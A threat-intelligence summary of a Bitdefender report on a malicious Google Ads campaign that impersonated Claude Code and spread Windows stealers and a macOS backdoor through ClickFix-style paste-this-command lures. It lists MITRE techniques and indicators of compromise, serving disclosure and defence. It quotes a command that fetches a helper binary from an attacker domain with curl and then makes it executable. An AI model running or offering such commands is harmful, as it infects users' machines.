Bitdefender found a malicious Google Ads campaign that impersonated Claude Code and redirected victims to a fake documentation site hosted on a Squarespace subdomain. The campaign delivered Windows stealers and a macOS backdoor through ClickFix-style commands, and was likely run using a compromised advertiser account linked to a Malaysian company. #ClaudeCode #Anthropic #GoogleAds #Squarespace
Keypoints
- The attack used a deceptive Google sponsored result that impersonated Claude Code to lure users searching for downloads.
- Victims were sent to a fake documentation page that closely mirrored the real Claude Code documentation and branding.
- Windows users were tricked into running
mshta.execommands that downloaded and executed a malicious payload. - macOS users were given obfuscated terminal commands that decoded Base64 content and launched a multi-stage infection chain.
- Bitdefender identified the Windows payloads as
Trojan.Stealer.GJ,Trojan.Stealer.GK,IL:Trojan.MSILZilla.245316, andGen:Variant.Barys.509034. - The macOS payload installed a Mach-O backdoor capable of spawning shells and enabling remote command execution.
- Researchers believe the campaign leveraged a compromised advertiser account associated with a Malaysian company, which Google later deactivated.
MITRE Techniques
- [T1059.001] PowerShell – Windows users were instructed to execute a malicious command through PowerShell to launch the infection chain (‘Windows users received instructions to run this in PowerShell’).
- [T1218.005] Mshta – The attackers abused a legitimate Windows utility to download and execute a remote payload (‘The command abuses mshta.exe, a legitimate Microsoft utility designed to execute HTML Applications’).
- [T1059.004] Unix Shell – The macOS payload was executed through shell commands piped into zsh and later used to spawn bash/zsh sessions (‘piped the decoded output directly into zsh’; ‘launch /bin/bash or /bin/zsh’).
- [T1027] Obfuscated Files or Information – The malware and installer logic were heavily obfuscated using Base64, arithmetic decryption loops, and string hiding (‘decodes a Base64-encoded string’; ‘heavy string obfuscation’).
- [T1140] Deobfuscate/Decode Files or Information – The script decoded Base64 content and decompressed embedded payloads before execution (‘decodes and decompresses embedded content, then executes it’).
- [T1105] Ingress Tool Transfer – The malware fetched secondary payloads and helper binaries from attacker-controlled infrastructure (‘download and execute a remote payload’; ‘curl -o /tmp/helper https://wriconsult[.]com/n8n/update’).
- [T1204.001] User Execution: Malicious File – The infection depended on the victim copying and running terminal commands from the fake installation page (‘the infection relies on the victim’s willingness to follow instructions’).
- [T1055] Process Injection – The HTA stage recursively decrypted and loaded payloads into memory, leading to shellcode execution (‘decrypt a memory-embedded Microsoft Intermediate Language (MSIL) payload that results in a shellcode’).
- [T1083] File and Directory Discovery – The macOS command removed extended attributes and changed file permissions before running the helper binary (‘xattr -c /tmp/helper && chmod +x /tmp/helper’).
- [T1548.001] Abuse Elevation Control Mechanism: Setuid and Setgid – Not directly stated as privilege escalation, but the abuse of trusted system utilities and permission changes was used to facilitate execution (‘grant execution rights, and launches the binary’).
Indicators of Compromise
- [SHA-256 hashes] Malware samples associated with the campaign – 79cd21185c51a5bfe2cfebdc51e14b258d91549fc0e4e09b6939c2a8a1c5ac19, 3b4d3a59024f14cf1f07395afd6957be05d125e00ae8fdcea3a5dee1d8ab9dd3, and 4 more hashes
- [Domains] Fake ad landing and payload delivery infrastructure – claude-code-cmd.squarespace[.]com, download.active-version[.]com, and wriconsult[.]com
- [URLs] Malicious download and lure links used in the campaign – hxxps://claude-code-cmd.squarespace[.]com, hxxp://code.claude[.]ai/download/, and hxxps://download.active-version[.]com/claude
- [File names / paths] Downloaded helper and execution targets on macOS/Windows – /tmp/helper, mshta.exe, and HTA-related payload components
Read more: https://www.bitdefender.com/en-us/blog/labs/fake-claude-code-google-ads-malware